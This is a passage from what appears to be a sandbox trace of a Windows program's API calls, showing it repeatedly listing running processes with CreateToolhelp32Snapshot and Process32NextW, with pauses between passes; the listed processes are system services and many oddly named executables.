th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.023] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.036] CloseHandle (hObject=0xc4) returned 1 [0139.036] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.041] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0139.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0139.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.085] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0139.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0139.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0139.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0139.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.149] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.150] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.152] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.153] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.155] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.156] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0139.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0139.173] CloseHandle (hObject=0xbc) returned 1 [0139.173] Sleep (dwMilliseconds=0x12c) [0139.561] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0139.567] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0139.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.571] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0139.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.574] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0139.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.579] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.579] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.582] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.584] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 